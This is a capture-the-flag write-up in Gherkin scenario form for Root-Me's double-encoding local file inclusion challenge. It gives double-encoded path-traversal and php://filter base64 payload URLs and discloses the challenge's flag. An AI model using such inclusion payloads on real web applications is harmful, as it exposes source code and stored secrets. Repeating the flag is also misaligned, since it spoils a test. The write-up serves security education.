## Version 2.0
## language: en

Feature: Web server-rootme
  Site:
    www.root-me.org
  Category:
    Web server
  User:
    dianaosorio97
  Goal:
    Find the validation password

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | kali-rolling    | 2019.1      |
    | Mozilla Firefox | 64.4.0      |
  Machine information:
    Given I am accessing the following link
    """
    https://www.root-me.org/es/Challenges/Web-Servidor
    /Local-File-Inclusion-Double-encoding
    """
    And I see the problem statement
    """
    Find the validation password in the source files of the website.
    """
    Then I selected the challenge button to start
    And The page redirects me to the following link
    """
    http://challenge01.root-me.org/web-serveur/ch45/
    """
    And I see a website from J.Smith that contain a cv and contact page
    When I see the contact page i get the following information
    """
    John Smith
    Professional doer
    Male
    1984/01/01 (35)
    Coffee developer @Megaupload - 01/2010
    Bed tester @YourMom's - 03/2011
    Beer drinker @NearestBar - 10/2014
    """

  Scenario: Fail:Using souble encoding from LFI
    Given The application doesn't accept special characters
    Then I try using double encoding from the special characters
    And I try navigate in the directories
    And I use the following url
    """
    http://challenge01.root-me.org/web-serveur/ch45/index.php?
    page=%252E%252E%252F
    """
    Then I get a warning message
    And I try insert a byte null
    """
    http://challenge01.root-me.org/web-serveur/ch45/index.php?
    page=%252E%252E%252F%2500
    """
    But This method doesn't work

  Scenario: Sucess: Using filter convert encode base 64
    Given The application include the .inc.php from the files
    Then I use filter convert encode base 64 to bypass it
    And I encode the special characters
    And I insert the following url
    """
    http://challenge01.root-me.org/web-serveur/ch45/index.php?page
    =php%253A%252F%252Ffilter%252Fconvert%252Ebase64-encode%252
    Fresource=home
    """
    Then I get the encoded source code from the page home
    And I use a web tool for decode
    """
    https://www.base64decode.org/
    """
    Then I can clearly see the source code of the home page
    And I notice that include a file conf
    And I try see the content from file conf
    """
    http://challenge01.root-me.org/web-serveur/ch45/index.php?
    page=php%253A%252F%252Ffilter%252Fconvert%252Ebase64-encode
    %252Fresource=conf
    """
    And I use a web tool for decode for see the content
    And I get the following output
    """
    <?php
    $conf = [
    "flag"        => "Th1sIsTh3Fl4g!",
    "home"        => '<h2>Welcome</h2>
    """
    Then I get the flag
    """
    Th1sIsTh3Fl4g!
    """
    And I put the code in the text field
    And I solve the challenge
